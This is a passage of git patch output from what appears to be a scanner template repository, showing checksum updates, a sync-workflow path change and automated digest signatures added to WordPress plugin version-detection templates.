-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:625385d0ec37d666b1fe403dcf859a1919b81995 -http/technologies/wordpress/plugins/templately.yaml:de191978de638d6d93213c162d2f861c1f7f602c -http/technologies/wordpress/plugins/the-events-calendar.yaml:ee6712feffc640bca75a8780f578bf38a2f7f5c4 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:2b4d2d3c2706a8736bd848f882e18bb587689859 +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:2ad2d70f13ce4a2850c0c2208a08cbdd8547d28e -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:eb9ee3cff46124f620f8288c5c4491dbb4feee66 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:3217a7c88d433924a7b0635ef4f1cebcb6f03ab7 -http/technologies/wordpress/plugins/under-construction-page.yaml:bd0f2117939877e506277c0f540903159c880ed4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:16ac983fe5152c13bb9680addb4b4beb402b78ad +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:c97ce21cadc041711ef3b7182a579c7ff36c3d53 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:92e453f2e4988d41981b02f39408d08a561d2a69 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:39e765f90355b97ba3a4b55584bf37f8fdff2ae3 -http/technologies/wordpress/plugins/webp-express.yaml:45d0bad812b446007edb72dec27e2cb63acbba5c -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:87a5e66bd3ea971996b55287ff7d52ddddf25fe0 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:dbf033b5e2edabfd135218fdeb551b7425ca589b -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:2e9a4d9aa64eb205fc55e129ea9209ace4835ef3 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:bd669d3e7d415282d59d5da6b57fd081eaeabff4 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:fcecf1e56de6ca51b968d505b7fa9d59e5185f19 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:80f79bdae355384502bfb239ea75c0ab90ff27e9 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:e9e826e19c2f4e9df25b260203cf6adb775682ee -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:347a6eab0a8da0724720f67698414cc91d5efd0a -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:3ad39431e197c6463be83e261f8374a9d6e40496 -http/technologies/wordpress/plugins/woocommerce-services.yaml:4db694649c2360857c425da3d1e3f1d38c783b69 -http/technologies/wordpress/plugins/woocommerce.yaml:aa5bb7af6ee865afa2e361c6d3bc5417df515f80 -http/technologies/wordpress/plugins/wordfence.yaml:9da54ca12d85a3199f30a50acfea80c228d4a1e1 -http/technologies/wordpress/plugins/wordpress-importer.yaml:ca0785c9870374d29796eb1d13b917a1415253d4 -http/technologies/wordpress/plugins/wordpress-seo.yaml:a1ae5339facbae16a1ddefea8c3a95ffbf935deb +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:1b73f7361a2c425f66460db5d743a0da482f8a23 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:2f594a17dc79736211922ac969cc1fc7b191feef -http/technologies/wordpress/plugins/wp-file-manager.yaml:97a6ea70c57e86263c77c0ec2d306df985dc0c24 -http/technologies/wordpress/plugins/wp-google-maps.yaml:a6017fccad37306ed59c6289c5fa1cc14694141b -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:958a01db0596ae9e082b20563a70402f80bd88c3 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:16631fc310eb49f07717cfdfb4d5779353a8e8ab -http/technologies/wordpress/plugins/wp-migrate-db.yaml:a49c6dc62f7921e688b94b9349f53a00b0eb84fb -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:8553cbb6dc173aa23ab7c66c5b7cc7c01e9a2a72 -http/technologies/wordpress/plugins/wp-optimize.yaml:44e3b78001bca258cceae6fefa43fcc497f9dd65 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:751654fa66ce43e3d56c4aa7d17d496e0a572aea -http/technologies/wordpress/plugins/wp-reset.yaml:b5e70e76a20b336a0c726b712663031567c44f89 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:4aa1b87212c5c5a62e42865b5c04e71c9c6e70f5 -http/technologies/wordpress/plugins/wp-rollback.yaml:43bd057ac6bf5b86f19977987f3547342503112e -http/technologies/wordpress/plugins/wp-seopress.yaml:90902654b3e7cabf05fe727b666e4a3cd321082f -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a47a99f08108d71871a3db71349f0b427de7f9b8 -http/technologies/wordpress/plugins/wp-smushit.yaml:903d6173bdb065b79502cd58ebcefc285937af6b -http/technologies/wordpress/plugins/wp-statistics.yaml:08e854896f0158b98df9ae6585311865b3c825b5 -http/technologies/wordpress/plugins/wp-super-cache.yaml:b21b40d2aa0ac8bacf3f439aa3ea263c763a2679 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:adbdb28ddc66c44681be8255729aa871831f2b53 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:8be5cbfeea44db32bfdbb892a8c0d46ea17ab67c -http/technologies/wordpress/plugins/wpforms-lite.yaml:594346cd95df7451b087c15e0ae4e110c6acb5bb -http/technologies/wordpress/plugins/wps-hide-login.yaml:65ef5901915bc82cc9969933ee3c5d9e06d5ad1e -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:4f17de7ffeedd6782808110ffcb451df575d2797 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:9ef82570a54440e945df26cf28c32f4ee5ab1300 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8822,7 +8822,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e0f2f9acff1719f3d3932e4d400f918b578223e0 +templates-checksum.txt:b940118fe4379021ad8d4632539d9d209aaa69ff wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2eaee957d52919b91367cb4d5f88ffdf88062483 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 07:46:13 +0000 Subject: [PATCH 0852/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index cad915145b..4b0eb71cce 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,7 +3,8 @@ on: push: paths: - '.new-additions' - - 'dast/vulnerabilities/xinclude-injection.yaml' + - 'dast/vulnerabilities/injection/csv-injection.yaml' + - 'dast/vulnerabilities/injection/xinclude-injection.yaml' - 'http/cves/2023/CVE-2023-3380.yaml' - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' From da7d9bd2cd6f12e17a4302074aa3c6e0d632a21e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 07:47:21 +0000 Subject: [PATCH 0853/1841] Auto Template Signing [Thu Jul 4 07:47:21 UTC 2024] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..4ea024eb60 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205f05206783188c54dc0cc8bac49757430473e73578d0cfe1847b8bba26b02639022100c274746344a8a5787a9cafff574745182577de6affb1715b0ea8a3f166bfa332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..c239885338 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ef832f58b4d5b371d998884eff933195bd61db8c52b92ce76961e333fe4072b00220233972cc00d8e6e78cc52132086ecbb8f11afb6e367c1069ef6d01d4dbc5be34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..0d1ad67cd2 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210086fcb1b231bfd4e7aba807991c371d9ee7cfb51276814ff0f269ab15039e62d002206cadbf8efaa306ecad28873815b86d70020da12de58ddd9e164e51473aadf09d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..5a9ea90aa4 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205db6d0fd6661bf5bb55f1058ebf5b4c1479cb9c5642beaea9c4c3784e21a95bb022100d15584ee1fd7f027a6b2be1b6f1f1b3a664838d90ab125eb8a5b444126d4fe71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 